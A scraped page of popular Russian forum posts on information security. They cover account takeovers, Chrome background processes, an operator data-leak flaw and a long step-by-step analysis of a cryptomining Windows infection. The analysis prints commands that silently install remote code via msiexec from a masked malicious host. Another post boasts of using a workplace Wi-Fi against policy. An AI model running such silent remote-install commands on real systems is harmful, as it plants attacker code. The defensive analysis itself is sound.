Сообщество - Информационная безопасность IT
Добавить пост
1 340 постов 24 657 подписчиков

Популярные теги в сообществе:

13350

Маск

Маск Республика Беларусь, Илон Маск, Интернет, Сеть, SpaceX, Старлинк, Starlink, Политика

Илона Маска попросили подключить Беларусь к интернету

Появилась петиция, в которой люди просят основателя Space X запустить тестирование спутникового интернета Starlink из-за недавнего отключения властями сети по всей стране.

8862

Человек, которого не взяли работу в отдел информационной безопасности, взломал сайт

Человека не взяли на работу, видать не соответствовал требованиям работодателя. В ответ он просто взломал сайт и оставил свое резюме на главной странице.

Между прочим, "хороший дядя" (так он себя называет) взломал сайт Национальной ассоциации электронных СМИ (Республика Узбекистан). Думаю отличный метод заявить о себе в качестве специалиста по информационной безопасности.

Человек, которого не взяли  работу в отдел информационной безопасности, взломал сайт Взлом, Информационная безопасность, Hacked, Узбекистан

Перевод: Здравствуйте, привет от хорошийдядя@gmail.com

Сайт прошел проверку от хорошего дяди которого не взяли на работу 


взято вот отсюда  @trolluz и от сюда naesmi.uz

Показать полностью 1
7099

Chrome продолжает работать даже после полного закрытия

Еще в 2011 году браузер Google Chrome обновился функцией, позволяющей расширениям и приложениям работать в фоновом режиме. Данная функция была введена с благой целью. Благодаря ей пользователи могут получать уведомления от приложений и расширений после закрытия браузера.



Однако в Google не подумали, что такая возможность требуется далеко не всем пользователям. Нажимая на кнопку закрытия Chrome, подавляющее большинство пользователей подразумевают его полное закрытие. На самом же деле оно не происходит. Множество процессов Chrome продолжают выполняться и нагружать компьютер, причем чем больше расширений установлено в браузере, тем сильнее нагрузка.

Функция, позволяющая сервисам браузера работать после его закрытия, по умолчанию включена у всех пользователей. К счастью, отключить ее очень просто.



Шаг 1. Вызовите меню параметров в правом верхнем углу окна Google Chrome и нажмите «Настройки».

Chrome продолжает работать даже после полного закрытия Google Chrome, Компьютер, Интернет, Длиннопост

Шаг 2. В самом низу страницы с параметрами нажмите «Дополнительные».

Chrome продолжает работать даже после полного закрытия Google Chrome, Компьютер, Интернет, Длиннопост

Шаг 3. Вновь прокрутите страницу до самого низа и переведите переключатель «Не отключать работающие в фоновом режиме сервисы при закрытии браузера» в неактивное положение.

Chrome продолжает работать даже после полного закрытия Google Chrome, Компьютер, Интернет, Длиннопост

Готово! При следующем закрытии браузер Google Chrome ни один сервис, ни одно расширение браузера не останется работать, благодаря чему Chrome перестанет потреблять ценные ресурсы компьютера в то время, когда вы работаете с другими программами.

Показать полностью 3
7040

СберМаркет и безопасность

ОТВЕТ ОТ СБЕРА #comment_185598809

Заходил как-то от нечего делать в сбермаркет, естественно зарегистрировался, но как-то ничего себе не подобрал, ну и забыл про него.

Вчера приходит мне сообщение мол совершен вход в мой сбермаркет - это был первый звоночек.

Сегодня пришло сообщение что с моего аккаунта совершен заказ, тут я не выдержал и позвонил в службу поддержки. Заказ на левый адрес они отменили, а вот со сменой пароля вышла заковыка - при попытке смены пароля по ссылке на е-мейл после ввода нового пароля сбермаркет пишет "неверная ссылка".

Звоню опять в службу поддержки, называю е-мейл и без каких-либо дополнительных подтверждениий мне меняют пароль. Как сказала оператор, ну адрес почты ведь только Вы знаете, поэтому тому кто позвонит и назовёт адрес электронной почты - пароль поменяем без проблем т.к. иных данных о пользователе у нас нет.

6911

Взломали страницу, что делать?

Решил поделиться, что же делать если вас\или вашего товарища в вк взломали и просят денег,

1. не палимся перед мошенником, а узнаем номер карты.

2. скринем\фоткаем\снимаем на видео переписку.

3. тыкаем на пожаловаться на страницу, пишем в поддержку, что страницу взломали.

4. проверяем принадлежность карты к банку (если это фотка карты, то это фотошоп)..проверить можно например здесь... https://www.bindb.com/bin-database.html но инфа не всегда достоверная

5. сообщаем в банк номер карты мошенников.

6. заходим на сайт https://мвд.рф/request_main выбираем отдел "К"

7. заполняем заявление прикладываем скрины переписок)

п.с. даже если вам не был причинен никакой материальный ущерб взлом чужой страницы это уже статья до 2-х лет).

Взломали страницу, что делать? Интернет-мошенники, Взлом вк, Борьба со злом
Взломали страницу, что делать? Интернет-мошенники, Взлом вк, Борьба со злом
Показать полностью 2
6600

Информационная безопасность или как два раза взломать wifi

Работаем с чужой интеллектуальной собственностью - поэтому строго-настрого запрещается в компьютерную сеть подключать свои устройства и пользоваться удаленным доступом к рабочему месту из дома. Многие сайты заблокированы чтобы народ сидел работал, а не писал посты на пикабу. Хе-хе-хе...


Где-то в прошлом году появился у нас на работе Wi-Fi. Но зараза с паролем - не для нас. Выяснили что он расположен в зале для конференций этажом выше. Спустя некоторое время на форуме выложили видео с очередной конференции и на одном моменте на видео было видно доску на которой был записан пароль "87654321". С тех пор некоторые из нас стали пользоваться вайфаем. Кто-то на телефоне через этот вайфай слушал яндекс-радио, которое на компьютере было заблокировано. То есть настройки блокировок у этой сети были другие и предназначена она для гостей, приезжавших на семинары. Что не мешало нам на ней сидеть при необходимости и обходить блокировки не рискуя установкой на компьютер vpn с прокси.


Неделю назад старая wi-fi сеть пропала и появилась с другим названием. Пароль перестал подходить. Вчера на внутреннем форуме выложили фотки с очередного семинара. Пароль был написан на доске.

Спасибо семинару =D Теперь у нас опять есть халявный wifi  xD

6426

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология
Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Показать полностью 19
6374

Опубликована уязвимость у всех российских сотовых операторов, позволяющая узнать номер, IMEI и местоположение абонента.

Источник - ЯПлакалЪ


Известный ресурс для айтишников в рунете - хабрахабр уже начал гудеть от опубликованной там сегодня в обед статьи "DPI мобильных операторов: от бесплатного интернета до раскрытия номера и местоположения".

Так как ресурс, что называется, "не для всех" и информация, изложенная в той статье, наверняка прошла бы мимо 99% читателей и пользователей сотовой связи, я бы хотел кратко и более доступным языком объяснить какой лютый треш сегодня на самом деле был обнародован!

Гениальный чувак, автор той статьи, сумел разобраться с тем, как сотовые операторы внедряют свои служебные заголовки в открываемые абонентами сотовых операторов страницы различных служебных сайтов сотовых операторов и научился модифицировать эти заголовки таким образом, чтобы при заходе на сайт вообще не принадлежащий сотовому оператору, от абонента на этот сайт отдавались следующие данные:


1) номер телефона абонента, закрепленный за SIM-картой, с которой происходит выход в интернет при заходе на такой злонамеренный сайт.

2) в некоторых случаях IMEI устройства.

3) при некоторых условиях - местоположения абонента по идентификаторам базовой станции, на которой сейчас работает абонент.

4) иные данные.


Кроме того, автор той статьи научился таким образом модифицировать заголовки своих запросов, что есть возможность попадать в личные кабинеты чужих номеров и работать в чужих Личных кабинентах с чужими номерами как со своими, а также получать бесплатный доступ в интернет при нулевом или отрицательном балансе.

Особо подчеркну, что никакие соксы и прокси, vpn, ssh и т.д. и т.п. пока на данный момент не помогут защититься от раскрытия указанных данных!

На самом хабрахабре уже опубликована ссылка на тестовый сайт, при заходе на который любой абонент МТС тут же увидит свой номер и получит входящий звонок. Можете попробовать сами!

Прошу оценить ситуацию: простой заход на тестовый сайт, не имеющий никакого отношения к доменам сотовых операторов и Вы деанонимизированы.

Как пишет автор статьи, дыра лишь частично закрыта сотовыми операторами с 2016 года, но большая часть уязвимостей не закрыта по текущий день.

Даже страшно себе представить, какой простор для мошеннических схем сейчас будет открыт...

Хабрахабр

Показать полностью
Отличная работа, все прочитано!